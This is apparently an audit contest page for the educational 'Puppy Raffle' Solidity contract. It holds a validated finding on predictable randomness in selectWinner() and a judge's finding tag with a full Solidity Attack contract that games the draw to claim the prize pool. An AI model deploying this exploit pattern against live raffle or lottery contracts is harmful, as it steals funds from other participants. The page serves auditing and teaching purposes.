Puppy Raffle
AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Insecure Randomness in selectWinner

wildmeadow732

Root + Impact

Predictable Randomness in selectWinner() Allows Winner Manipulation

Description

The selectWinner() function uses on-chain values to generate randomness:

uint256 winnerIndex =
uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty)))
% players.length;

This approach is insecure because the inputs are either predictable or controllable:

  • msg.sender → fully controlled by caller

  • block.timestamp → manipulable within a small range by validators

  • block.difficulty → predictable / replaced by prevrandao in newer versions

This violates secure randomness principles such as:

  • Unpredictable randomness in blockchain

Risk

Likelihood:

  • Medium to High:

    • No access control on selectWinner()

    • Anyone can trigger winner selection

    • Attack requires minimal cost and no special privileges

Impact:

  • An attacker can bias or manipulate the raffle outcome by:

    • Calling selectWinner() at a favorable time

    • Using multiple addresses to influence msg.sender

    • Repeatedly attempting execution across blocks

    This can result in:

    • Increased probability of winning

    • Unfair distribution of rewards

    • Loss of user trust in the raffle system

Proof of Concept

  1. Attacker enters raffle with one or more addresses

  2. Monitors mempool / timing opportunities

  3. Locally computes:

    keccak256(abi.encodePacked(attackerAddress, timestamp, difficulty)) % players.length

  4. Waits for a block where:

    • Computed winnerIndex corresponds to attacker’s position

Calls selectWinner() at that moment


Recommended Mitigation

Use verifiable randomness:

  • Chainlink VRF

This ensures:

  • Randomness is provably fair

  • Cannot be manipulated by users or validators

Alternative:

  • Commit-reveal schemes

  • Off-chain randomness with verification

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 3 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!